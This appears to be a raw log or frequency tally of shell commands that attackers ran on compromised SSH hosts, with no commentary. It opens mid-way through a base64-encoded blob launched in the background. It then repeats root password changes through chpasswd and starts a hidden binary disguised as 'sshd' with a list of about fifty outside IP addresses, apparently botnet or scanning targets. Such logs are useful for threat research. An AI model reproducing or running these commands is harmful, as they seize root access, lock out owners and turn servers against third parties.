8bPqDaIKEDQLCb4M8KqFhqXuC7wIBTgLCr4I8KKLiL3vD7wCEzAUCb0a6qSSjqDoFL4LEi4XCLUA6KONjKf+C7UKCzMLAb4U5qSGiqPvCrgYETcLCb0L8KKOib3rCLYOFTEXDKwO6b2Oj6TwCbwWFDASAroK76GOnKLuC6IJFzYLCboU7KKKhqXuC78PBTYTFr4K6L2Phb3qCLYOFTEVC6wO6b2Oj6TwAroWFDgTAroK76eLnKvwCL0PCzIUFr0N66mKjKLuA6wMEi4SDqII76OSjaDpALoIFDEQGLgN8KGPir3sCqIMHDoTCL0I7rOIi73sCboWFzQWFr0O7amKjKLuCKwACzERCKII7aeSjaDoALoIFDAQGLgN8KGJjr3tD6IBFToTCL0I6bOIi73sD74WFDELDrwA6KONjqX+CL0JCzERAaIL6KOSjqLqALoIFDQdGLgN8KGIj73vCLsWFDQVAroK76ePnKvwCL0ACzEXDaII7qGGiqPvDrsYETcLCrgJ8KGPkqDmALoIFDMSF9I3gNiDpIWBu1S66UGrmZY=" & |
1 |
head -c 0 > /tmp/O5I40cYCQd |
1 |
echo "root:ZLv8wOk5dhQQ"|chpasswd|bash |
1 |
echo "root:AVydR268yowT"|chpasswd|bash |
1 |
echo "root:Akyda7LAxOXI"|chpasswd|bash |
1 |
chmod +x ./.2427470675643461471/sshd;nohup ./.2427470675643461471/sshd 125.87.84.61 125.87.86.165 176.120.17.70 125.87.84.187 125.87.81.109 125.87.89.250 54.238.183.93 125.87.90.57 125.87.82.191 188.168.87.142 125.87.80.165 125.87.87.18 125.87.93.203 15.236.95.168 125.87.92.138 43.247.68.87 125.87.86.5 125.87.81.83 125.87.84.41 14.199.52.62 57.180.54.242 222.136.36.198 125.87.89.210 125.87.84.12 18.162.230.251 125.87.88.241 125.87.89.81 47.109.28.100 125.87.80.190 125.87.87.4 125.87.81.241 125.87.90.107 125.87.90.116 125.87.92.205 125.87.88.95 125.87.94.187 125.87.85.168 125.87.91.34 125.87.86.190 52.91.199.247 125.87.84.207 182.118.187.131 125.87.95.53 139.28.74.130 125.87.89.78 27.11.99.10 125.87.81.173 85.28.47.144 125.87.95.161 125.87.88.138 125.87.93.86 & |
1 |
echo "root:yis2h7wE1m77"|chpasswd|bash |
1 |
echo "root:czevGAcUpWWG"|chpasswd|bash |
1 |
echo "root:VyliSqJwRV0A"|chpasswd|bash |
1 |
echo "root:C2x7TXvftlm5"|chpasswd|bash |
1 |
echo "root:RB9fi1uqGYnQ"|chpasswd|bash |
1 |